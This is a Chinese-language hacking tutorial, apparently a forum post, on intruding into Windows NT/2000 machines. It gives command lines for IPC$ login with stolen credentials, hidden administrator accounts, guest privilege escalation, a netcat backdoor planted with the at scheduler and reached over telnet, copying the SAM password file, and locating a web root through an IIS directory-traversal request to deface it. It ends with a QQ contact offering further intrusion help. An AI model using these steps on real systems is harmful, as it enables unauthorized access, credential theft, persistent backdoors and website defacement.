關於檢測目標主機的漏洞

其實最重要的是檢測對方漏洞，用流光5.0，而後根據信息構造入侵計劃；其實PC對於某些高手來講，是很是容易入侵的，簡單編寫個程序就能夠搞定你。

1：NET
只要你擁有某IP的用戶名和密碼，那就用IPC\$作鏈接吧！
這裏咱們假如你獲得的用戶是hbx，密碼是123456。假設對方IP爲127.0.0.1
net use \\127.0.0.1\ipc\$ 123456 /user:hbx null密碼爲空
退出的命令是
net use \\127.0.0.1\ipc\$ /delete
--------------------------------
net share是查看主機共享資源咱們用它建一個祕密共享目錄吧net share me=c:\winnt\system32 這樣這個機器就有了一個名爲me的共享目錄，而打開它就是winnt下的system32目錄，若是你用win2000的系統就知這個目錄有多重要了，若是不想要也好辦net share me /delete 呵呵，沒有了，是否是很方便的啊。
---------------------- ---------------------- ----------------------
下面的操做你必須登錄後才能夠用.登錄的方法就在上面.
---------------------- ---------------------- ----------------------
下面咱們講怎麼建立一個用戶，因爲SA的權限至關於系統的超級用戶.
咱們加一個heibai的用戶密碼爲lovechina
net user heibai lovechina /add
只要顯示命令成功，那麼咱們能夠把他加入Administrator組了.
net localgroup Administrators heibai /add
----------------------
這裏是講映\*對方的C盤，固然其餘盤也能夠，只要存在就好了.咱們這裏把對方的C盤映\*到本地的Z盤.
net use z:\\127.0.0.1\c\$
----------------------
net start telnet
這樣能夠打開對方的TELNET服務.
----------------------
這裏是將Guest用戶激活，guest是NT的默認用戶，並且沒法刪除呢？不知道是否這樣，個人2000就是刪除不了它。
net user guest /active:yes(特別注意:這個命令是把原來被禁用的guest賬戶再次激活)
----------------------
net user guest /active:no這樣這個guest的用戶就又被禁用了
----------------------
這裏是把一個用戶的密碼改掉，咱們把guest的密碼改成lovechina，其餘用戶也能夠的。只要有權限就好了呀！
net user guest lovechina
有人問到提升權限的問題 下面就解決下
net localgroup administrators guest /add
將guest變爲administrator
net命令果真強大啊！ net view命令看對方開了共享
-------------------------------------------------------------------------------------------------------------
net user是查看全部用戶列表，看看哪一個用戶是和你同樣偷跑進來的，給他名給刪掉，讓他美，
net user 用戶名 /delete哈哈,他沒有了,管他什麼是否是管理員呢,不過咱們仍是查一下管理員組有什麼用戶吧,這樣的用戶纔對咱們有用嘛 net localgroup administrators就列出管理員組成員了,再查看一下administrator這個用戶，由於這個是建立系統時建出來的，因此要看看他的系統是什麼時間建立出來的
net user administrator，而後再查看別的管理員用戶是什麼時間建立的，若是相差太遠，那多是被別人偷偷跑來偷建的，一概del，安全第一哦................
---------------------------------------------------------------------------------------------------------------------------
2:at
通常一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麼啓動他呢？
那麼須要用AT命令，這裏假設你已經登錄了那個服務器。
----------------------
你首先要獲得對方的時間，
net time \\127.0.0.1
----------------------
將會返回一個時間，這裏假設時間爲12:1，如今須要新建一個做業，其ID=1
at \\127.0.0.1 12:3 nc.exe
這裏假設了一個木馬，名爲NC.EXE，這個東西要在對方服務器上.
這裏介紹一下NC，NC是NETCAT的簡稱，爲了方便輸入，通常會被更名.它是一個TELNET服務，端口爲99.
等到了12:3就能夠鏈接到對方的99端口.這樣就給對方種下了木馬.
-----------------------------------------------------
at命令功能強大,下面能夠打個比方:
C:\> AT 22:30 Start C:\prettyboy.mp3
新加了一項做業，其做業 ID = 1 [如今咱們新創建了一個任務 在22:30分 系統將自動播放歌曲]
---------------------------------------------------------------------------------------------------------------------------
3:telnet
這個命令很是實用，它能夠與遠方作鏈接，不過正常下須要密碼、用戶，不過你給對方種了木馬，直接連到這個木馬打開的端口.
telnet 127.0.0.1 99
這樣就能夠連到對方的99端口.那你就能夠在對方運行命令了，這個也就是肉雞.
---------------------------------------------------------------------------------------------------------------------------
4:FTP
它能夠將你的東西傳到對方機子上，你能夠去申請個支持FTP上傳的空間，國內多的是，若是真的找不到，我給WWW.51.NET，不錯的.當咱們申請完後，它會給用戶名，密碼，以及FTP服務器.
在上傳前須要登錄先，這裏咱們假設FTP服務器WWW.51.NET，用戶名是HUCJS，密碼是654321
ftp www.51.net
他會要求輸入用戶，成功後會要求輸入密碼.
----------------------
下面先說上傳，假設你需上傳的文件是INDEX.HTM，它位於C:\下，傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM，下到你的機子的D盤下
put c:\index.htm d:\
--------------------------------------------------
這裏的問題是兩個命令的解釋正好弄反了，登錄ＦＴＰ服務器後get纔是下載，而put命令是上傳，這和tftp的命令正好相反，在tftp命令裏get是上傳put是下載，這下明白了吧，並且在ＦＴＰ服務器中不能用c:\和d:\這樣來指明路徑，這也是在tftp裏面用的方法，FTP可不會執行的，不信你去試好了，正確應該這樣上傳文件put index.htm這樣就足夠了，裝c盤根目錄下的index.htm文件上傳到FTP服務器的當前目錄下，不喜歡就del index.htm刪掉這文件，下載時先查看一下目錄，dir而後看這個目錄裏有什麼，有你要的你就get index.htm這樣就把index.htm這個文件下載到你本身的c盤根目錄下了。
--------------------------------------------------------------
get index.htm c:\inetpub\wwwroot\index.htm（這裏是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm）"
--------------------------------------------------------------------------------
5:copy
下面我說說怎樣把本地的文件複製到對方硬盤上去， 須要創建好IPC\$鏈接纔有效。
這裏咱們把本地C盤下的index.htm複製到127.0.0.1的C盤下
copy index.htm \\127.0.0.1\c\$\index.htm
----------------------
若是你要複製到D盤下 把C改成D， 就好了！
copy index.htm \\127.0.0.1\d\$\index.htm
----------------------
若是你要把他複製到 WINNT 目錄裏
就要把輸入
copy index.htm \\127.0.0.1\admin\$\index.htm
admin\$是winnt
---------------------
要把對方的文件複製過來，順便告訴你們 NT的備份的數據庫放在x:\winnt\repair\sam._ sam._是數據庫的文件名
---------------------- ----------------------
下面就把127.0.0.1的數據庫複製到本地C盤下
copy \\127.0.0.1\admin\$\repair\sam._ c:\
這個sam._這明顯是NT主機的口令檔，若是是win2000機器的口令文件應該是sam
---------------------------------------------------------------------------------------------------------------------------
6：set
若是你跑進了一部機子，並且想黑他（這思想只能在特別時候才準有），固然他的80端口要開，否則你黑給誰看。這時須要用SET命令！
下面是我獲得的結果！我來分析它，只是找主頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登錄者的IP，這裏原本是顯示個人IP，被我刪除了
HTTP_ACCEPT_ENCODING=gzip， deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址，只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這裏是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=\$P\$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址，這裏告訴你們一個技巧，很笨的技巧啊，不過只能用這個方法才能100%的找到主頁的名稱，當你DIR這個目錄時，必定會看到不少文件，你能夠把全部文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名，這樣只要看到和XX.XX.XX.XX看到的也面如出一轍，那麼這就是主頁的名稱了。
---------------------------------------------------------------------------------------------------------------------------
還有一些打不進去超過1萬，但願瞭解加好友++QQ：553981007